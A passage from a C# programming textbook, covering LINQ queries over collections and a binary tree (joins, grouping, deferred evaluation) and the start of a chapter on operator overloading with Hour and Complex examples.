{companiesPerCountry.Key}\t{companiesPerCountry.Count()} companies");
foreach (var companies in companiesPerCountry)
{
Console.WriteLine($"\t{companies.CompanyName}");
}
Download from finelybook [email protected]
715
}
You can invoke summary functions such as Count over the collection
returned by an enumerable collection like this:
Click here to view code image
int numberOfCompanies = (from a in addresses
select a.CompanyName).Count();
Notice that you wrap the expression in parentheses. If you want to ignore
duplicate values, use the Distinct method:
Click here to view code image
int numberOfCountries = (from a in addresses
select a.Country).Distinct().Count();
Tip In many cases, you probably want to count just the number of rows
in a collection rather than the number of values in a field across all the
rows in the collection. In this case, you can invoke the Count method
directly over the original collection, like this:
Click here to view code image
int numberOfCompanies = addresses.Count();
You can use the join operator to combine two collections across a
common key. The following example shows the query returning customers
and addresses over the CompanyName column in each collection, this time
rephrased by using the join operator. You use the on clause with the equals
operator to specify how the two collections are related.
Note LINQ currently supports equi-joins (joins based on equality) only.
If you are a database developer who is used to SQL, you might be
familiar with joins based on other operators, such as > and <, but LINQ
Download from finelybook [email protected]
716
does not provide these features.
Click here to view code image
var countriesAndCustomers = from a in addresses
join c in customers
on a.CompanyName equals
c.CompanyName
select new { c.FirstName,
c.LastName, a.Country };
Note In contrast with SQL, the order of the expressions in the on clause
of a LINQ expression is important. You must place the item you are
joining from (referencing the data in the collection in the from clause) to
the left of the equals operator and the item you are joining with
(referencing the data in the collection in the join clause) to the right.
LINQ provides a large number of other methods for summarizing
information and joining, grouping, and searching through data. This section
has covered just the most common features. For example, LINQ provides the
Intersect and Union methods, which you can use to perform set-wide
operations. It also provides methods such as Any and All that you can use to
determine whether at least one item in a collection or every item in a
collection matches a specified predicate. You can partition the values in an
enumerable collection by using the Take and Skip methods. For more
information, see the material in the LINQ section of the documentation
provided with Visual Studio 2017.
Querying data in Tree<TItem> objects
The examples you’ve seen so far in this chapter have shown how to query the
data in an array. You can use the same techniques for any collection class that
implements the generic IEnumerable<T> interface. In the following exercise,
you will define a new class for modeling employees for a company. You will
Download from finelybook [email protected]
717
create a BinaryTree object containing a collection of Employee objects, and
then you will use LINQ to query this information. You will initially call the
LINQ extension methods directly, but then you will modify your code to use
query operators.
Retrieve data from a BinaryTree by using the extension methods
1. Start Visual Studio 2017 if it is not already running.
2. Open the QueryBinaryTree solution, which is located in the \Microsoft
Press\VCSBS\ Chapter 21\QueryBinaryTree folder in your Documents
folder. The project contains the Program.cs file, which defines the
Program class with the Main and doWork methods that you have seen in
previous exercises.
The solution also includes a copy of the BinaryTree project that you
have seen in previous chapters.
3. In Solution Explorer, right-click the QueryBinaryTree project, point to
Add, and then click Class. In the Add New Item - Query BinaryTree
dialog box, type Employee.cs in the Name box, and then click Add.
4. Add the automatic properties shown in bold in the following code to the
Employee class:
Click here to view code image
class Employee
{
public string FirstName { get; set; }
public string LastName { get; set; }
public string Department { get; set; }
public int Id { get; set; }
}
5. Add the ToString method shown in bold in the code that follows to the
Employee class. Types in the .NET Framework use this method when
converting the object to a string representation, such as when displaying
it by using the Console.WriteLine statement.
Click here to view code image
class Employee
{
...
Download from finelybook [email protected]
718
public override string ToString() =>
$"Id: {this.Id}, Name: {this.FirstName} {this.LastName},
Dept: {this.Department}";
}
6. Modify the definition of the Employee class to implement the
IComparable<Employee> interface, as shown here:
Click here to view code image
class Employee : IComparable<Employee>
{
}
This step is necessary because the BinaryTree class specifies that its
elements must be “comparable.”
7. Hover over the IComparable<Employee> interface in the class
definition, click the lightbulb icon that appears, and then click
Implement Interface Explicitly on the context menu.
This action generates a default implementation of the CompareTo
method. Remember that the BinaryTree class calls this method when it
needs to compare elements when inserting them into the tree.
8. Replace the body of the CompareTo method with the following code
shown in bold. This implementation of the CompareTo method
compares Employee objects based on the value of the Id field.
Click here to view code image
int IComparable<Employee>.CompareTo(Employee other)
{
if (other == null)
{
return 1;
}
if (this.Id > other.Id)
{
return 1;
}
if (this.Id < other.Id)
{
return -1;
}
Download from finelybook [email protected]
719
return 0;
}
Note For a description of the IComparable<T> interface, refer to
Chapter 19.
9. In Solution Explorer, right-click the QueryBinaryTree project, point to
Add, and then click Reference. In the Reference Manager -
QueryBinaryTree dialog box, in the left pane, click Solution. In the
middle pane, select the BinaryTree project, and then click OK.
10. Display the Program.cs file for the QueryBinaryTree project in the Code
and Text Editor window, and verify that the list of using directives at the
top of the file includes the following line of code (it should be greyed
out as you have not yet written any code that uses types in this
namespace):
using System.Linq;
11. Add the following using directive to the list at the top of the Program.cs
file to bring the BinaryTree namespace into scope:
using BinaryTree;
12. In the doWork method in the Program class, remove the // TODO:
comment and add the following statements shown in bold to construct
and populate an instance of the BinaryTree class:
Click here to view code image
static void doWork()
{
Tree<Employee> empTree = new Tree<Employee>(
new Employee { Id = 1, FirstName = "Kim", LastName =
"Abercrombie",
Department = "IT"
});
empTree.Insert(
new Employee { Id = 2, FirstName = "Jeff", LastName =
Download from finelybook [email protected]
720
"Hay",
Department = "Marketing"
});
empTree.Insert(
new Employee { Id = 4, FirstName = "Charlie", LastName =
"Herb",
Department = "IT"
});
empTree.Insert(
new Employee { Id = 6, FirstName = "Chris", LastName =
"Preston",
Department = "Sales"
});
empTree.Insert(
new Employee { Id = 3, FirstName = "Dave", LastName =
"Barnett",
Department = "Sales"
});
empTree.Insert(
new Employee { Id = 5, FirstName = "Tim", LastName =
"Litton",
Department = "Marketing"
});
}
13. Add the following statements shown in bold to the end of the doWork
method. This code invokes the Select method to list the departments
found in the binary tree.
Click here to view code image
static void doWork()
{
...
Console.WriteLine("List of departments");
var depts = empTree.Select(d => d.Department);
foreach (var dept in depts)
{
Console.WriteLine($"Department: ");
}
}
14. On the Debug menu, click Start Without Debugging.
Download from finelybook [email protected]
721
The application should output the following list of departments:
Click here to view code image
List of departments
Department: IT
Department: Marketing
Department: Sales
Department: IT
Department: Marketing
Department: Sales
Each department occurs twice because there are two employees in each
department. The order of the departments is determined by the
CompareTo method of the Employee class, which uses the Id property of
each employee to sort the data. The first department is for the employee
with the Id value 1, the second department is for the employee with the
Id value 2, and so on.
15. Press Enter to return to Visual Studio 2017.
16. In the doWork method in the Program class, modify the statement that
creates the enumerable collection of departments as shown in bold in the
following example:
Click here to view code image
var depts = empTree.Select(d => d.Department).Distinct();
The Distinct method removes duplicate rows from the enumerable
collection.
17. On the Debug menu, click Start Without Debugging.
Verify that the application now displays each department only once, like
this:
Click here to view code image
List of departments
Department: IT
Department: Marketing
Department: Sales
18. Press Enter to return to Visual Studio 2017.
19. Add the following statements shown in bold to the end of the doWork
Download from finelybook [email protected]
722
method. This block of code uses the Where method to filter the
employees and return only those in the IT department. The Select
method returns the entire row rather than projecting specific columns.
Click here to view code image
static void doWork()
{
...
Console.WriteLine();
Console.WriteLine("Employees in the IT department");
var ITEmployees =
empTree.Where(e => String.Equals(e.Department, "IT"))
.Select(emp => emp);
foreach (var emp in ITEmployees)
{
Console.WriteLine(emp);
}
}
20. After the code from the preceding step, add the following code shown in
bold to the end of the doWork method. This code uses the GroupBy
method to group the employees found in the binary tree by department.
The outer foreach statement iterates through each group, displaying the
name of the department. The inner foreach statement displays the names
of the employees in each department.
Click here to view code image
static void doWork()
{
...
Console.WriteLine("");
Console.WriteLine("All employees grouped by department");
var employeesByDept = empTree.GroupBy(e => e.Department);
foreach (var dept in employeesByDept)
{
Console.WriteLine($"Department: {dept.Key}");
foreach (var emp in dept)
{
Console.WriteLine($"\t{emp.FirstName}
{emp.LastName}");
}
}
}
21. On the Debug menu, click Start Without Debugging. Verify that the
Download from finelybook [email protected]
723
output of the application looks like this:
Click here to view code image
List of departments
Department: IT
Department: Marketing
Department: Sales
Employees in the IT department
Id: 1, Name: Kim Abercrombie, Dept: IT
Id: 4, Name: Charlie Herb, Dept: IT
All employees grouped by department
Department: IT
Kim Abercrombie
Charlie Herb
Department: Marketing
Jeff Hay
Tim Litton
Department: Sales
Dave Barnett
Chris Preston
22. Press Enter to return to Visual Studio 2017.
Retrieve data from a BinaryTree by using query operators
1. In the doWork method, comment out the statement that generates the
enumerable collection of departments and replace it with the equivalent
statement shown in bold, using the from and select query operators:
Click here to view code image
// var depts = empTree.Select(d => d.Department).Distinct();
var depts = (from d in empTree
select d.Department).Distinct();
2. Comment out the statement that generates the enumerable collection of
employees in the IT department and replace it with the following code
shown in bold:
Click here to view code image
// var ITEmployees =
// empTree.Where(e => String.Equals(e.Department, "IT"))
// .Select(emp => emp);
var ITEmployees = from e in empTree
where String.Equals(e.Department, "IT")
Download from finelybook [email protected]
724
select e;
3. Comment out the statement that generates the enumerable collection that
groups employees by department and replace it with the statement
shown in bold in the following code:
Click here to view code image
// var employeesByDept = empTree.GroupBy(e => e.Department);
var employeesByDept = from e in empTree
group e by e.Department;
4. On the Debug menu, click Start Without Debugging. Verify that the
program displays the same results as before.
Click here to view code image
List of departments
Department: IT
Department: Marketing
Department: Sales
Employees in the IT department
Id: 1, Name: Kim Abercrombie, Dept: IT
Id: 4, Name: Charlie Herb, Dept: IT
All employees grouped by department
Department: IT
Kim Abercrombie
Charlie Herb
Department: Marketing
Jeff Hay
Tim Litton
Department: Sales
Dave Barnett
Chris Preston
5. Press Enter to return to Visual Studio 2017.
LINQ and deferred evaluation
When you use LINQ to define an enumerable collection, either by using the
LINQ extension methods or by using query operators, you should remember
that the application does not actually build the collection at the time that the
LINQ extension method is executed; the collection is enumerated only when
you iterate over it. This means that the data in the original collection can
change in the time between the execution of a LINQ query and when the data
that the query identifies is retrieved; you will always fetch the most up-to-
Download from finelybook [email protected]
725
date data. For example, the following query (which you saw earlier) defines
an enumerable collection of companies in the United States:
Click here to view code image
var usCompanies = from a in addresses
where String.Equals(a.Country, "United States")
select a.CompanyName;
The data in the addresses array is not retrieved, and any conditions
specified in the Where filter are not evaluated, until you iterate through the
usCompanies collection:
Click here to view code image
foreach (string name in usCompanies)
{
Console.WriteLine(name);
}
If you modify the data in the addresses array in the time between defining
the usCompanies collection and iterating through the collection (for example,
if you add a new company based in the United States), you will see this new
data. This strategy is referred to as deferred evaluation.
You can force the evaluation of a LINQ query when it is defined and
generate a static, cached collection. This collection is a copy of the original
data and will not change if the data in the collection changes. LINQ provides
the ToList method to build a static List object containing a cached copy of the
data. You use it like this:
Click here to view code image
var usCompanies = from a in addresses.ToList()
where String.Equals(a.Country, "United States")
select a.CompanyName;
This time, the list of companies is fixed when you create the query. If you
add more United States companies to the addresses array, you will not see
them when you iterate through the usCompanies collection. LINQ also
provides the ToArray method that stores the cached collection as an array.
In the final exercise in this chapter, you will compare the effects of using
deferred evaluation of a LINQ query to generating a cached collection.
Download from finelybook [email protected]
726
Examine the effects of deferred and cached evaluation of a LINQ query
1. Return to Visual Studio 2017, display the QueryBinaryTree project, and
then edit the Program.cs file.
2. Comment out the contents of the doWork method apart from the
statements that construct the empTree binary tree, as shown here:
Click here to view code image
static void doWork()
{
Tree<Employee> empTree = new Tree<Employee>(
new Employee { Id = 1, FirstName = "Kim", LastName =
"Abercrombie",
Department = "IT"
});
...
empTree.Insert(
new Employee { Id = 5, FirstName = "Tim", LastName =
"Litton",
Department = "Marketing"
});
/* comment out the rest of the method
...
*/
}
Tip You can comment out a block of code by selecting the entire
block in the Code and Text Editor window and then clicking the
Comment Out The Selected Lines button on the toolbar.
3. Add the following statements shown in bold to the doWork method,
after the code that creates and populates the empTree binary tree:
Click here to view code image
static void doWork()
{
...
Download from finelybook [email protected]
727
Console.WriteLine("All employees");
var allEmployees = from e in empTree
select e;
foreach (var emp in allEmployees)
{
Console.WriteLine(emp);
}
...
}
This code generates an enumerable collection of employees named
allEmployees and then iterates through this collection, displaying the
details of each employee.
4. Add the following code immediately after the statements you typed in
the preceding step:
Click here to view code image
static void doWork()
{
...
empTree.Insert(new Employee
{
Id = 7,
FirstName = "David",
LastName = "Simpson",
Department = "IT"
});
Console.WriteLine();
Console.WriteLine("Employee added");
Console.WriteLine("All employees");
foreach (var emp in allEmployees)
{
Console.WriteLine(emp);
}
...
}
These statements add a new employee to the empTree tree and then
iterate through the allEmployees collection again.
5. On the Debug menu, click Start Without Debugging. Verify that the
output of the application looks like this:
Click here to view code image
Download from finelybook [email protected]
728
All employees
Id: 1, Name: Kim Abercrombie, Dept: IT
Id: 2, Name: Jeff Hay, Dept: Marketing
Id: 3, Name: Dave Barnett, Dept: Sales
Id: 4, Name: Charlie Herb, Dept: IT
Id: 5, Name: Tim Litton, Dept: Marketing
Id: 6, Name: Chris Preston, Dept: Sales
Employee added
All employees
Id: 1, Name: Kim Abercrombie, Dept: IT
Id: 2, Name: Jeff Hay, Dept: Marketing
Id: 3, Name: Dave Barnett, Dept: Sales
Id: 4, Name: Charlie Herb, Dept: IT
Id: 5, Name: Tim Litton, Dept: Marketing
Id: 6, Name: Chris Preston, Dept: Sales
Id: 7, Name: David Simpson, Dept: IT
Notice that the second time the application iterates through the
allEmployees collection, the list displayed includes David Simpson,
even though this employee was added only after the allEmployees
collection was defined.
6. Press Enter to return to Visual Studio 2017.
7. In the doWork method, change the statement that generates the
allEmployees collection to identify and cache the data immediately, as
shown here in bold:
Click here to view code image
var allEmployees = from e in empTree.ToList<Employee>()
select e;
LINQ provides generic and nongeneric versions of the ToList and
ToArray methods. If possible, it is better to use the generic versions of
these methods to ensure the type safety of the result. The data returned
by the select operator is an Employee object, and the code shown in this
step generates allEmployees as a generic List<Employee> collection.
8. On the Debug menu, click Start Without Debugging. Verify that the
output of the application looks like this:
Click here to view code image
All employees
Id: 1, Name: Kim Abercrombie, Dept: IT
Id: 2, Name: Jeff Hay, Dept: Marketing
Download from finelybook [email protected]
729
Id: 3, Name: Dave Barnett, Dept: Sales
Id: 4, Name: Charlie Herb, Dept: IT
Id: 5, Name: Tim Litton, Dept: Marketing
Id: 6, Name: Chris Preston, Dept: Sales
Employee added
All employees
Id: 1, Name: Kim Abercrombie, Dept: IT
Id: 2, Name: Jeff Hay, Dept: Marketing
Id: 3, Name: Dave Barnett, Dept: Sales
Id: 4, Name: Charlie Herb, Dept: IT
Id: 5, Name: Tim Litton, Dept: Marketing
Id: 6, Name: Chris Preston, Dept: Sales
Notice that the second time the application iterates through the
allEmployees collection, the list displayed does not include David
Simpson. In this case, the query is evaluated and the results are cached
before David Simpson is added to the empTree binary tree.
9. Press Enter to return to Visual Studio 2017.
Summary
In this chapter, you learned how LINQ uses the IEnumerable<T> interface
and extension methods to provide a mechanism for querying data. You also
saw how these features support the query expression syntax in C#.
If you want to continue to the next chapter, keep Visual Studio 2017
running and turn to Chapter 22, ”Operator overloading.”
If you want to exit Visual Studio 2017 now, on the File menu, click
Exit. If you see a Save dialog box, click Yes and save the project.
Quick reference
To
Do this
Project specified fields
from an enumerable
collection
Use the Select method and specify a lambda
expression that identifies the fields to project. For
example:
Click here to view code image
var customerFirstNames =
Download from finelybook [email protected]
730
customers.Select(cust => cust.FirstName);
Or use the from and select query operators. For
example:
Click here to view code image
var customerFirstNames =
from cust in customers
select cust.FirstName;
Filter rows from an
enumerable collection
Use the Where method, and specify a lambda
expression containing the criteria that rows should
match. For example:
Click here to view code image
var usCompanies = addresses
.Where(addr =>
String.Equals(addr.Country,"United
States"))
.Select(usComp => usComp.CompanyName);
Or use the where query operator. For example:
Click here to view code image
var usCompanies = addresses
.Where(addr =>
String.Equals(addr.Country,"United
States"))
.Select(usComp => usComp.CompanyName);
Enumerate data in a
specific order
Use the OrderBy method and specify a lambda
expression identifying the field to use to order
rows. For example:
Click here to view code image
var companyNames = addresses
.OrderBy(addr => addr.CompanyName)
.Select(comp => comp.CompanyName);
Or, use the orderby query operator. For example:
Click here to view code image
var companyNames =
from a in addresses
orderby a.CompanyName
select a.CompanyName;
Download from finelybook [email protected]
731
Group data by the
values in a field
Use the GroupBy method and specify a lambda
expression identifying the field to use to group
rows. For example:
Click here to view code image
var companiesGroupedByCountry = addresses
.GroupBy(addres => addrs.Country);
Or, use the group by query operator. For example:
Click here to view code image
var companiesGroupedByCountry =
from a in addresses
group a by a.Country;
Join data held in two
different collections
Use the Join method, specifying the collection
with which to join, the join criteria, and the fields
for the result. For example:
Click here to view code image
var countriesAndCustomers = customers
.Select(c => new { c.FirstName,
c.LastName,
c.CompanyName })
.Join(addresses, custs =>
custs.CompanyName,
addrs => addrs.CompanyName,
(custs, addrs) => new
{custs.FirstName,
custs.LastName, addrs.Country });
Or, use the join query operator. For example:
Click here to view code image
var countriesAndCustomers =
from a in addresses
join c in customers
on a.CompanyName equals c.CompanyName
select new { c.FirstName, c.LastName,
a.Country
};
Force immediate
generation of the
results for a LINQ
query
Use the ToList or ToArray method to generate a
list or an array containing the results. For
example:
Click here to view code image
Download from finelybook [email protected]
732
var allEmployees =
from e in empTree.ToList<Employee>()
select e;
Download from finelybook [email protected]
733
CHAPTER 22
Operator overloading
After completing this chapter, you will be able to:
Implement binary operators for your own types.
Implement unary operators for your own types.
Write increment and decrement operators for your own types.
Understand the need to implement some operators as pairs.
Implement implicit conversion operators for your own types.
Implement explicit conversion operators for your own types.
The examples throughout this book make great use of the standard operator
symbols (such as + and –) to perform standard operations (such as addition
and subtraction) on types (such as int and double). Many of the built-in types
come with their own predefined behaviors for each operator. You can also
define how operators should behave in your own structures and classes,
which is the subject of this chapter.
Understanding operators
It is worth recapping some of the fundamental aspects of operators before
delving into the details of how they work and how you can overload them.
The following list summarizes these aspects:
You use operators to combine operands into expressions. Each operator
Download from finelybook [email protected]
734
has its own semantics, dependent on the type with which it works. For
example, the + operator means “add” when you use it with numeric
types or “concatenate” when you use it with strings.
Each operator has a precedence. For example, the * operator has a
higher precedence than the + operator. This means that the expression
a + b * c is the same as a + (b * c).
Each operator also has an associativity that defines whether the
operator evaluates from left to right or from right to left. For example,
the = operator is right-associative (it evaluates from right to left), so a
= b = c is the same as a = (b = c).
A unary operator is an operator that has just one operand. For
example, the increment operator (++) is a unary operator.
A binary operator is an operator that has two operands. For example,
the multiplication operator (*) is a binary operator.
Operator constraints
This book presents many examples of how with C# you can overload
methods when defining your own types. With C#, you can also overload
many of the existing operator symbols for your own types, although the
syntax is slightly different. When you do this, the operators you implement
automatically fall into a well-defined framework with the following rules:
You cannot change the precedence and associativity of an operator.
Precedence and associativity are based on the operator symbol (for
example, +) and not on the type (for example, int) on which the
operator symbol is being used. Hence, the expression a + b * c is
always the same as a + (b * c) regardless of the types of a, b, and c.
You cannot change the multiplicity (the number of operands) of an
operator. For example, * (the symbol for multiplication) is a binary
operator. If you declare a * operator for your own type, it must be a
binary operator.
You cannot invent new operator symbols. For example, you can’t
create an operator symbol such as ** for raising one number to the
power of another number. You’d have to define a method to do that.
You can’t change the meaning of operators when they are applied to
Download from finelybook [email protected]
735
built-in types. For example, the expression 1 + 2 has a predefined
meaning, and you’re not allowed to override this meaning. If you could
do this, things would be too complicated.
There are some operator symbols that you can’t overload. For example,
you can’t overload the dot (.) operator, which indicates access to a
class member. Again, if you could do this, it would lead to unnecessary
complexity.
Tip You can use indexers to simulate [ ] as an operator. Similarly, you
can use properties to simulate assignment (=) as an operator, and you
can use delegates to mimic a function call as an operator.
Overloaded operators
To define your own operator behavior, you must overload a selected operator.
You use method-like syntax with a return type and parameters, but the name
of the method is the keyword operator together with the operator symbol you
are declaring. For example, the following code shows a user-defined structure
named Hour that defines a binary + operator to add together two instances of
Hour.
Click here to view code image
struct Hour
{
public Hour(int initialValue) => this.value = initialValue;
public static Hour operator +(Hour lhs, Hour rhs) => new
Hour(lhs.value + rhs.value);
...
private int value;
}
Notice the following:
The operator is public. All operators must be public.
The operator is static. All operators must be static. Operators are never
Download from finelybook [email protected]
736
polymorphic and cannot use the virtual, abstract, override, or sealed
modifiers.
A binary operator (such as the + operator shown in this example) has
two explicit arguments, and a unary operator has one explicit
argument. (C++ programmers should note that operators never have a
hidden this parameter.)
Tip When you declare highly stylized functionality (such as operators),
it is useful to adopt a naming convention for the parameters. For
example, developers often use lhs and rhs (acronyms for left-hand side
and right-hand side, respectively) for binary operators.
When you use the + operator on two expressions of type Hour, the C#
compiler automatically converts your code to a call to your operator +
method. The C# compiler transforms this code:
Click here to view code image
Hour Example(Hour a, Hour b) => a + b;
to this:
Click here to view code image
Hour Example(Hour a, Hour b) => Hour.operator +(a,b); // pseudocode
Note, however, that this syntax is pseudocode and not valid C#. You can
use a binary operator only in its standard infix notation (with the symbol
between the operands).
There is one final rule that you must follow when declaring an operator: at
least one of the parameters must always be of the containing type. In the
preceding operator+ example for the Hour class, one of the parameters, a or
b, must be an Hour object. In this example, both parameters are Hour objects.
However, there could be times when you want to define additional
implementations of operator+ that add, for example, an integer (a number of
hours) to an Hour object—the first parameter could be Hour, and the second
Download from finelybook [email protected]
737
parameter could be the integer. This rule makes it easier for the compiler to
know where to look when trying to resolve an operator invocation, and it also
ensures that you can’t change the meaning of the built-in operators.
Creating symmetric operators
In the preceding section, you saw how to declare a binary + operator to add
together two instances of type Hour. The Hour structure also has a
constructor that creates an Hour from an int. This means that you can add
together an Hour and an int; you just have to first use the Hour constructor to
convert the int to an Hour, as in the following example:
Click here to view code image
Hour a = ...;
int b = ...;
Hour later = a + new Hour(b);
This is certainly valid code, but it is not as clear or concise as adding an
Hour and an int directly, like this:
Click here to view code image
Hour a = ...;
int b = ...;
Hour later = a + b;
To make the expression (a + b) valid, you must specify what it means to
add together an Hour (a, on the left) and an int (b, on the right). In other
words, you must declare a binary + operator whose first parameter is an Hour
and whose second parameter is an int. The following code shows the
recommended approach:
Click here to view code image
struct Hour
{
public Hour(int initialValue) => this.value = initialValue;
...
public static Hour operator +(Hour lhs, Hour rhs) => new
Hour(lhs.value + rhs.value);
public static Hour operator +(Hour lhs, int rhs) => lhs + new
Hour(rhs);
...
private int value;
Download from finelybook [email protected]
738
}
Notice that all the second version of the operator does is construct an
Hour from its int argument and then call the first version. In this way, the real
logic behind the operator is held in a single place. The point is that the extra
operator+ simply makes existing functionality easier to use. Also, notice that
you should not provide many different versions of this operator, each with a
different second parameter type; instead, cater to the common and
meaningful cases only, and let the user of the class take any additional steps
if an unusual case is required.
This operator+ declares how to add together an Hour as the left operand
and an int as the right operand. It does not declare how to add together an int
as the left operand and an Hour as the right operand:
Click here to view code image
int a = ...;
Hour b = ...;
Hour later = a + b; // compile-time error
This is counterintuitive. If you can write the expression a + b, you expect
also to be able to write b + a. Therefore, you should provide another overload
of operator+:
Click here to view code image
struct Hour
{
public Hour(int initialValue) => this.value = initialValue;
...
public static Hour operator +(Hour lhs, int rhs) => lhs + new
Hour(rhs);
public static Hour operator +(int lhs, Hour rhs) => new Hour(lhs)
+ rhs;
...
private int value;
}
Note C++ programmers should notice that you must provide the
overload yourself. The compiler won’t write the overload for you or
Download from finelybook [email protected]
739
silently swap the sequence of the two operands to find a matching
operator.
Operators and language interoperability
Not all languages that execute using the common language runtime
(CLR) support or understand operator overloading. If you overload an
operator, you should provide an alternative mechanism that implements
the same functionality to enable the class to be used from languages that
do not support operator overloading. For example, suppose that you
implement operator+ for the Hour structure, as is illustrated here:
Click here to view code image
public static Hour operator +(Hour lhs, int rhs)
{
...
}
If you need to be able to use your class from a Microsoft Visual
Basic application, you should also provide an Add method that achieves
the same thing, as demonstrated here:
Click here to view code image
public static Hour Add(Hour lhs, int rhs)
{
...
}
Understanding compound assignment evaluation
A compound assignment operator (such as +=) is always evaluated in terms
of its associated simple operator (such as +). In other words, the statement
a += b;
is automatically evaluated like this:
a = a + b;
Download from finelybook [email protected]
740
In general, the expression a @= b (where @ represents any valid
operator) is always evaluated as a = a @ b. If you have overloaded the
appropriate simple operator, the overloaded version is automatically called
when you use its associated compound assignment operator, as is shown in
the following example:
Click here to view code image
Hour a = ...;
int b = ...;
a += a; // same as a = a + a
a += b; // same as a = a + b
The first compound assignment expression (a += a) is valid because a is
of type Hour, and the Hour type declares a binary operator+ whose
parameters are both Hour. Similarly, the second compound assignment
expression (a += b) is also valid because a is of type Hour and b is of type
int. The Hour type also declares a binary operator+ whose first parameter is
an Hour and whose second parameter is an int. Be aware, however, that you
cannot write the expression b += a because that’s the same as b = b + a.
Although the addition is valid, the assignment is not, because there is no way
to assign an Hour to the built-in int type.
Declaring increment and decrement operators
With C#, you can declare your own version of the increment (++) and
decrement (- -) operators. The usual rules apply when declaring these
operators: they must be public, they must be static, and they must be unary
(they can take only a single parameter). Here is the increment operator for the
Hour structure:
Click here to view code image
struct Hour
{
...
public static Hour operator ++(Hour arg)
{
arg.value++;
return arg;
}
...
Download from finelybook [email protected]
741
private int value;
}
The increment and decrement operators are unique in that they can be
used in prefix and postfix forms. C# cleverly uses the same single operator
for both the prefix and postfix versions. The result of a postfix expression is
the value of the operand before the expression takes place. In other words, the
compiler effectively converts the code
Click here to view code image
Hour now = new Hour(9);
Hour postfix = now++;
to this:
Click here to view code image
Hour now = new Hour(9);
Hour postfix = now;
now = Hour.operator ++(now); // pseudocode, not valid C#
The result of a prefix expression is the return value of the operator, so the
C# compiler effectively transforms the code
Hour now = new Hour(9);
Hour prefix = ++now;
to this:
Click here to view code image
Hour now = new Hour(9);
now = Hour.operator ++(now); // pseudocode, not valid in C#
Hour prefix = now;
This equivalence means that the return type of the increment and
decrement operators must be the same as the parameter type.
Comparing operators in structures and classes
Be aware that the implementation of the increment operator in the Hour
structure works only because Hour is a structure. If you change Hour into a
class but leave the implementation of its increment operator unchanged, you
will find that the postfix translation won’t give the correct answer. If you
remember that a class is a reference type, and if you revisit the compiler
Download from finelybook [email protected]
742
translations explained earlier, you can see in the following example why the
operators for the Hour class no longer function as expected:
Click here to view code image
Hour now = new Hour(9);
Hour postfix = now;
now = Hour.operator ++(now); // pseudocode, not valid C#
If Hour is a class, the assignment statement postfix = now makes the
variable postfix refer to the same object as now. Updating now automatically
updates postfix! If Hour is a structure, the assignment statement makes a copy
of now in postfix, and any changes to now leave postfix unchanged, which is
what you want.
The correct implementation of the increment operator when Hour is a
class is as follows:
Click here to view code image
class Hour
{
public Hour(int initialValue) => this.value = initialValue;
...
public static Hour operator ++(Hour arg) => new Hour(arg.value +
1);
...
private int value;
}
Notice that operator ++ now creates a new object based on the data in the
original. The data in the new object is incremented, but the data in the
original is left unchanged. Although this works, the compiler translation of
the increment operator results in a new object being created each time it is
used. This can be expensive in terms of memory use and garbage-collection
overhead. Therefore, it is recommended that you limit operator overloads
when you define types. This recommendation applies to all operators, not just
to the increment operator.
Defining operator pairs
Some operators naturally come in pairs. For example, if you can compare two
Hour values by using the != operator, you would expect to be able to also
Download from finelybook [email protected]
743
compare two Hour values by using the == operator. The C# compiler
enforces this very reasonable expectation by insisting that if you define either
operator == or operator !=, you must define them both. This neither-or-both
rule also applies to the < and > operators and the <= and >= operators. The
C# compiler does not write any of these operator partners for you. You must
write them all explicitly yourself, regardless of how obvious they might
seem. Here are the == and != operators for the Hour structure:
Click here to view code image
struct Hour
{
public Hour(int initialValue) => this.value = initialValue;
...
public static bool operator ==(Hour lhs, Hour rhs) => lhs.value
== rhs.value;
public static bool operator !=(Hour lhs, Hour rhs) => lhs.value
!= rhs.value;
...
private int value;
}
The return type from these operators does not actually have to be Boolean.
However, you should have a very good reason for using some other type, or
these operators could become very confusing.
Overriding the equality operators
If you define operator == and operator != in a class, you should also
override the Equals and GetHashCode methods inherited from
System.Object (or System.ValueType if you are creating a structure).
The Equals method should exhibit the same behavior as operator ==.
(You should define one in terms of the other.) The GetHashCode
method is used by other classes in the Microsoft .NET Framework.
(When you use an object as a key in a hash table, for example, the
GetHashCode method is called on the object to help calculate a hash
value. For more information, see the .NET Framework reference
documentation supplied with Visual Studio 2017.) All this method
needs to do is return a distinguishing integer value. Don’t return the
same integer from the GetHashCode method of all your objects,
however, because this will nullify the effectiveness of the hashing
Download from finelybook [email protected]
744
algorithms.
Implementing operators
In the following exercise, you will develop a class that simulates complex
numbers.
A complex number has two elements: a real component and an imaginary
component. Typically, a complex number is represented in the form (x + iy),
where x is the real component, and iy is the imaginary component. The values
of x and y are regular integers, and i represents the square root of –1 (which is
the reason why iy is imaginary). Despite their rather obscure and theoretical
feel, complex numbers have a large number of uses in the fields of
electronics, applied mathematics, and physics, and in many aspects of
engineering. If you want more information about how and why complex
numbers are useful, Wikipedia provides a useful and informative article.
Note The Microsoft .NET Framework version 4.0 and later includes a
type called Complex in the System.Numerics namespace that
implements complex numbers, so there is no real need to define your
own version of this type anymore. However, it is still instructive to see
how to implement some of the common operators for this type.
You will implement complex numbers as a pair of integers that represent
the coefficients x and y for the real and imaginary elements. You will also
implement the operators necessary for performing simple arithmetic using
complex numbers. The following table summarizes how to perform the four
primary arithmetic operations on a pair of complex numbers, (a + bi) and (c +
di).
Operation
Calculation
Download from finelybook [email protected]
745
(a + bi) + (c +
di)
((a + c) + (b + d)i)
(a + bi) – (c +
di)
((a – c) + (b – d)i)
(a + bi) * (c +
di)
(( a * c – b * d) + (b * c + a * d)i)
(a + bi) / (c +
di)
((( a * c + b * d) / ( c * c + d * d)) + (( b * c – a * d) / ( c * c
+ d * d))i)
Create the Complex class and implement the arithmetic operators
1. Start Visual Studio 2017 if it is not already running.
2. Open the ComplexNumbers solution, which is located in the \Microsoft
Press\VCSBS\Chapter 22\ComplexNumbers folder in your Documents
folder. This is a console application that you will use to build and test
your code. The Program.cs file contains the familiar doWork method.
3. In Solution Explorer, click the ComplexNumbers project. On the Project
menu, click Add Class. In the Add New Item - ComplexNumbers dialog
box, in the Name box, type Complex.cs, and then click Add.
Visual Studio creates the Complex class and opens the Complex.cs file
in the Code and Text Editor window.
4. Add the automatic integer properties Real and Imaginary to the Complex
class, as shown by the code in bold that follows.
class Complex
{
public int Real { get; set; }
public int Imaginary { get; set; }
}
These properties will hold the real and imaginary components of a
complex number.
5. Add the constructor shown below in bold to the Complex class.
Click here to view code image
class Complex
{
Download from finelybook [email protected]
746
...
public Complex (int real, int imaginary)
{
this.Real = real;
this.Imaginary = imaginary;
}
}
